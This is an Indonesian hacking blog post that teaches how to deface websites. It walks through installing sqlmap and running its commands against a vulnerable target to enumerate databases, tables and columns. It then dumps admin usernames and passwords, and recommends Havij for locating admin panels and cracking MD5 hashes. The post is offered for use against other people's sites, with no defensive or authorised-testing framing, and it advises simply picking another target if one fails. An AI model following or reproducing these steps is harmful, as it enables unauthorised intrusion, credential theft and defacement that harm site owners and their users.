Cara deface web dengan Schemafuz

>> Selasa, 14 Januari 2014

Ok mulai dari step yang pertama..

1. Sediakan Python dapat di cari di google dengan versi 2.7.3
2. Sqlmap. Download http://205.196.12...sqlmap.rar
3. Command Promt (saya gunakan Win XP)

Ok mulai tahap pertama

1. Download python serta Sqlmap nya
2. Extract rar Sqlmap lalu rename folder sqlmap dengan root ,
3. lalu pindahkan ke Drive C
4. Buka Cmd lalu ketikan seperti ini .
cd c:\root [ENTER]
sqlmap.py
Seperti ini .

2.bp.blogspot.com/-vEUbrQWUaFQ/UNKdYf_7mjI/AAAAAAAAAZQ/u51qfL-0h6E/s640/sd.JPG


Mudahkan Mantab deh...

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini :
sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database)
"Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :

3.bp.blogspot.com/-2GqlnoCYWyc/T6-XTCaBfPI/AAAAAAAAATw/p6T-X78mi8w/s640/MencariDbs.png

6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah :
sqlmap.py -u SiteVuln -D database nya --tables ENTER ,
Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :

3.bp.blogspot.com/-G1QqYvogmVo/T6-faq_bzdI/AAAAAAAAAUQ/FwiBt8quzPA/s640/EksekusiUser.png

7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -T Tabel nya --columns
,, Oke kalo udah Enter lagi , dan lihat hasil nya :

4.bp.blogspot.com/-jPlhrud6pXc/T6-kg9Xr9rI/AAAAAAAAAUg/rnEwuuIGV04/s640/udah+menemukanuser%252Bpassadmin.png

Ea kk , jangan berbahagia dulu soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya

8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :
sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama auntuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :

3.bp.blogspot.com/-HqatD00P-OQ/T6-qFCTxlJI/AAAAAAAAAUw/miYmobDMNDU/s640/Berhasil+mendapatkan+username%252Bpassword+admin.png

dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5,masalah tersebut bisa di atasi pake havij Takut "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" .
pesen seya si sebelum di scen pakek python seken dloo pakek hevij panel adminya yaaa.

sumber : http://forum.wonogiri-cyber-team.org/forum/viewthread.php?thread_id=19

Diposting oleh Haker Palembang di 01.34

0 komentar:

Posting Komentar

Posting Komentar

Langganan: Posting Komentar (Atom)

  © Arie Hidayatullah Hacker Palembang | 2011

Back to TOP